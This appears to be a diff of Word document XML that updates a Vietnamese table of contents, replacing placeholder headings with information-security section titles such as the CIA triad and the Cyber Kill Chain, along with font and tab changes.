+            <w14:ligatures w14:val="none"/>
           </w:rPr>
           <w:tab/>
         </w:r>
@@ -648,11 +656,10 @@
             <w:bCs/>
             <w:noProof/>
           </w:rPr>
-          <w:t>GIỚI THIỆU</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
+          <w:t>GIỚI THIỆU TỔNG QUAN</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -660,7 +667,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -668,22 +674,19 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc207351921 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343436 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -691,7 +694,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -699,7 +701,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -711,15 +712,20 @@
       <w:pPr>
         <w:pStyle w:val="TOC2"/>
         <w:tabs>
-          <w:tab w:val="left" w:pos="960"/>
+          <w:tab w:val="left" w:pos="880"/>
           <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
           <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc207351922" w:history="1">
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343437" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -732,8 +738,13 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
           </w:rPr>
           <w:tab/>
         </w:r>
@@ -745,11 +756,10 @@
             <w:bCs/>
             <w:noProof/>
           </w:rPr>
-          <w:t>Tiểu mục cấp 2</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:t>Các khái niệm cơ bản về an toàn thông tin</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -757,7 +767,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -765,22 +774,19 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc207351922 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343437 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -788,7 +794,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -796,7 +801,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -808,15 +812,20 @@
       <w:pPr>
         <w:pStyle w:val="TOC3"/>
         <w:tabs>
-          <w:tab w:val="left" w:pos="1440"/>
+          <w:tab w:val="left" w:pos="1320"/>
           <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
           <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc207351923" w:history="1">
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343438" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -831,8 +840,13 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
           </w:rPr>
           <w:tab/>
         </w:r>
@@ -846,11 +860,10 @@
             <w:iCs/>
             <w:noProof/>
           </w:rPr>
-          <w:t>Tiểu mục cấp 3</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:t>Tam giác bảo mật CIA (Confidentiality, Integrity, Availability)</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -858,7 +871,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -866,22 +878,19 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc207351923 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343438 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -889,7 +898,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -897,7 +905,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -907,310 +914,22 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="TOC2"/>
+        <w:pStyle w:val="TOC3"/>
         <w:tabs>
-          <w:tab w:val="left" w:pos="960"/>
+          <w:tab w:val="left" w:pos="1320"/>
           <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
           <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc207351924" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:b/>
-            <w:bCs/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>1.2.</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:b/>
-            <w:bCs/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>Tiểu mục cấp 2</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="begin"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc207351924 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="separate"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>1</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="end"/>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TOC1"/>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="480"/>
-          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
-        </w:tabs>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
-          <w:noProof/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc207351925" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:cs="Times New Roman"/>
-            <w:b/>
-            <w:bCs/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>2.</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:sz w:val="24"/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:cs="Times New Roman"/>
-            <w:b/>
-            <w:bCs/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>PHÂN TÍCH THIẾT KẾ</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="begin"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc207351925 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="separate"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>1</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="end"/>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TOC2"/>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="960"/>
-          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
-        </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc207351926" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:b/>
-            <w:bCs/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>2.1.</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:b/>
-            <w:bCs/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>Tiểu mục cấp 2</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="begin"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc207351926 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="separate"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>1</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="end"/>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TOC3"/>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="1440"/>
-          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
-        </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc207351927" w:history="1">
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343439" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1221,12 +940,17 @@
             <w:iCs/>
             <w:noProof/>
           </w:rPr>
-          <w:t>2.1.1.</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
+          <w:t>1.1.2.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
           </w:rPr>
           <w:tab/>
         </w:r>
@@ -1240,11 +964,10 @@
             <w:iCs/>
             <w:noProof/>
           </w:rPr>
-          <w:t>Tiểu mục cấp 3</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:t>Phân loại đối tượng tấn công</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -1252,7 +975,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -1260,22 +982,19 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc207351927 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343439 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -1283,7 +1002,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -1291,7 +1009,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -1301,114 +1018,22 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="TOC4"/>
+        <w:pStyle w:val="TOC2"/>
         <w:tabs>
-          <w:tab w:val="left" w:pos="1920"/>
+          <w:tab w:val="left" w:pos="880"/>
           <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
           <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc207351928" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:i/>
-            <w:iCs/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>2.1.1.1.</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:i/>
-            <w:iCs/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>Tiểu mục cấp 4</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="begin"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc207351928 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="separate"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>1</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="end"/>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TOC2"/>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="960"/>
-          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
-        </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc207351929" w:history="1">
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343440" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1417,12 +1042,17 @@
             <w:bCs/>
             <w:noProof/>
           </w:rPr>
-          <w:t>2.2.</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
+          <w:t>1.2.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
           </w:rPr>
           <w:tab/>
         </w:r>
@@ -1434,19 +1064,117 @@
             <w:bCs/>
             <w:noProof/>
           </w:rPr>
-          <w:t>Tiểu mục cấp 2</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
+          <w:t>Vòng đời tấn công mạng (Cyber Kill Chain)</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343440 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>1</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC2"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="880"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343441" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
+            <w:b/>
